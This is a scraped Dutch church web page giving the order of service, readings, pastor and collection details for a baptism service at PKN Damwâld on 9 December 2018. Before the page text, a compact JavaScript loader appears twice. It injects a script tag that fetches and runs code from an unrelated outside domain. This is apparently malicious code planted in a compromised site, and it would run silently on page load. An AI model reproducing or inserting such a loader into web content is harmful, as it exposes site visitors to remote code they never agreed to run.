;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 9 december 2018 9:30 uur - PKN Damwâld
zondag 9 december 2018
09:30 uur
Tweede Advent

Kerkdienst zondag 9 december 2018 9:30 uur

Thema: Doopdienst

Informatie

Voorganger:Ds. G.J. Otter
Organist:Foeke Wiegersma
Thema:Doopdienst
Mededeling:Tweede Advent
Liturgie
Lied voor de dienst Gez.124: 1, 3 en 5
Welkom
Aanvangslied Gez.125: 3 en 5
Stil gebed, Votum en groet
We zingen: Ps.139: 1 en 7
Formulier doop en gebed
We zingen: Verbonden met vader en moeder
Doop
King kids bijdrage over kerstproject
Zondag 9 december: Lucas 1:26-38
Thema: Wat U doet is goed
Projectthema: Maria draagt in vertrouwen
We zingen: projectlied
Gebed
We lezen: Lucas 1: 26 - 38
We zingen: Ps. 25:4 en 7
Preek .
We zingen met beamer Magnificat Sela
Dankzegging en voorbede
Collecte
Slotlied ELB 279 1,2 en 3
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: De Ikker Hearewei 1, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Collecte Pastoraat - Pastoraat nieuwe stijl

In steeds meer plattelandsgemeenten is de afgelopen jaren het aantal predikanten teruggebracht. Gemeenteleden zijn in toenemende mate voor het onderling pastoraat op elkaar aangewezen. De Protestantse Kerk werkt met plaatselijke gemeenten samen aan laagdrempelige vormen voor onderlinge zorg en pastoraat. Ervaringen worden gebundeld en beschikbaar gesteld voor andere gemeenten. Daarnaast worden hiervoor trainingen georganiseerd, zoals "Nieuwe wegen in het pastoraat". Ook voor beginners in een pastorale taak en voor degenen die zich in een bepaald aspect van pastoraat verder willen verdiepen zijn er trainingen. Nieuwe kennis en vaardigheden maken het mogelijk om bij te blijven in een veranderende samenleving en kerk

Tweede collecte: Kerk
Uitganscollecte: Bouwfonds